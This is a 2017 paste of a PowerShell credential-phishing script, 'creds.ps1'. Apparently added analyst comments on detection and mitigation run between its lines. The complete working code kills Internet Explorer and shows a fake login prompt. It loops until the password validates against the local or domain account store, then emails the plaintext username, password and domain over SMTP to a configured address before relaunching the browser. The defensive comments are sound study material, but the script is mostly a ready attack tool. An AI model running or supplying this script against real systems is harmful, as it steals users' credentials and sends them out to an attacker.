
Untitled

a guest
Sep 10th, 2017
  1. ########################################################################################################################
  2. #creds.ps1
  3. #Used to socially steal a user's credentials
  4. #Script by: LogoiLab
  5. #
  6. #synopsis:
  7. #
  8. #When run: "creds.ps1" will wait for user to open iexplore.exe(internet explorer). Upon the execution of iexplore.exe
  9. #the script will stop iexplore.exe and pop up a window telling the user to "Input his/her username and password to use
  10. #Internet Explorer" it will then check the creds against the SAM Module, if they don't match the current user's, it will
  11. #ask again. Upon correct user/pass combination the script will send an email with all the creds to the specified address
  12. #in the "config" section below. Then the script will re-launch iexplore.exe.
      #
      # Analyst notes (defensive review of the listing below):
      #  - Observable sequence: one-second process polling, forced termination of iexplore, a host-generated
      #    credential prompt, credential validation, one outbound mail via System.Net.Mail.SmtpClient, browser relaunch.
      #  - Detection: PowerShell script block logging (event 4104) records the PromptForCredential call and the
      #    System.Net.Mail object creation; process telemetry shows a PowerShell host terminating iexplore.exe;
      #    network telemetry shows a PowerShell host opening a mail-submission connection from a workstation.
      #  - Mitigation: application control (AppLocker / WDAC) with Constrained Language Mode restricts the
      #    Add-Type / New-Object usage seen here; egress filtering of direct mail submission from workstations
      #    removes the exfiltration path; multi-factor authentication limits the value of a captured password.
  13. #config#################################################################################################################
  14. #IMAP server address:
  15. $serv = ""
  16. #IMAP server port:
  17. $servport = ""
  18. #email account username:
  19. $user = ""
  20. #email account password:
  21. $pass = ""
  22. #your email/the email you wish to send from:
  23. $from = ""
  24. #the address you want the exfil email sent to:
  25. $to = ""
  26. ########################################################################################################################
      # Initial snapshot: is any process named "iexplore" already running?
  27. $process = Get-Process | Where-Object {$_.ProcessName -eq "iexplore"}
  28. while ($true){
      # Poll the process list once per second until an "iexplore" process appears.
  29. while (!($process))
  30. {
  31. $process = Get-Process | Where-Object {$_.ProcessName -eq "iexplore"}
  32. start-sleep -s 1
  33. }
  34. if ($process)
  35. {
      # The browser is force-terminated by name. An abrupt browser close immediately followed by a
      # credential prompt is the user-visible indicator worth covering in awareness training.
  36. stop-process -processname iexplore -force
  37. $process.WaitForExit()
  38. start-sleep -s 1
  39. $process = Get-Process | Where-Object {$_.ProcessName -eq "iexplore"}
      # From here on errors are suppressed, so failures in the steps below are not shown to the user.
  40. $ErrorActionPreference="SilentlyContinue"
  41. Add-Type -assemblyname system.DirectoryServices.accountmanagement
      # ContextType Machine: validation below is performed against the local machine's account store.
  42. $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine)
      # LDAP path built from the default ADSI root; presumably empty on a host that is not domain-joined - verify.
  43. $domainDN = "LDAP://" + ([ADSI]"").distinguishedName
      # Prompt loop: repeats until a submitted username/password pair validates locally or against the directory.
  44. while($true)
  45. {
      # The dialog is raised by the PowerShell host ($host.ui), not by Internet Explorer.
  46. $credential = $host.ui.PromptForCredential("Credentials are required to perform this operation", "Please enter your user name and password.", "", "")
  47. if($credential)
  48. {
  49. $creds = $credential.GetNetworkCredential()
  50. [String]$user = $creds.username
  51. [String]$pass = $creds.password
  52. [String]$domain = $creds.domain
      # Every submission is tested with ValidateCredentials (local) and a DirectoryEntry bind (directory).
      # NOTE(review): rejected submissions likely surface as failed-logon events (e.g. Security 4625) on the
      # host or the domain controller - confirm in your environment before relying on it for detection.
  53. $authlocal = $DS.ValidateCredentials($user, $pass)
  54. $authdomain = New-Object System.DirectoryServices.DirectoryEntry($domainDN,$user,$pass)
  55. if(($authlocal -eq $true) -or ($authdomain.name -ne $null))
  56. {
      # The validated username, password and domain are concatenated in plaintext into a script-scoped variable.
  57. $script:pastevalue = "Username: " + $user + " Password: " + $pass + " Domain:" + $domain + " Domain:"+ $authdomain.name
  58. break
  59. }
  60. }
  61. }
      # Exfiltration stage: the values set in the config section are copied into the mail settings used below.
  62. $emailSmtpServer = "$serv"
  63. $emailSmtpServerPort = "$servport"
  64. $emailSmtpUser = "$user"
  65. $emailSmtpPass = "$pass"
  66.  
  67. $emailFrom = "$from"
  68. $emailTo = "$to"
  69.  
      # Plain-text message with the fixed subject "Account Email"; the body is the captured credential string.
  70. $emailMessage = New-Object System.Net.Mail.MailMessage( $emailFrom , $emailTo )
  71. $emailMessage.Subject = "Account Email"
  72. $emailMessage.IsBodyHtml = $false
  73. $emailMessage.Body = $pastevalue
  74.  
      # The session uses TLS (EnableSsl), so network content inspection will not see the message body;
      # detection has to rely on the connection itself (PowerShell host talking to a mail server).
  75. $SMTPClient = New-Object System.Net.Mail.SmtpClient( $emailSmtpServer , $emailSmtpServerPort )
  76. $SMTPClient.EnableSsl = $true
  77. $SMTPClient.Credentials = New-Object System.Net.NetworkCredential( $emailSmtpUser , $emailSmtpPass );
  78.  
  79. $SMTPClient.Send( $emailMessage )
      # The browser is relaunched and the script exits after a single capture; nothing in this listing
      # establishes persistence, so how the script was started has to be investigated separately.
  80. start-process iexplore
  81. exit
  82. }
  83. }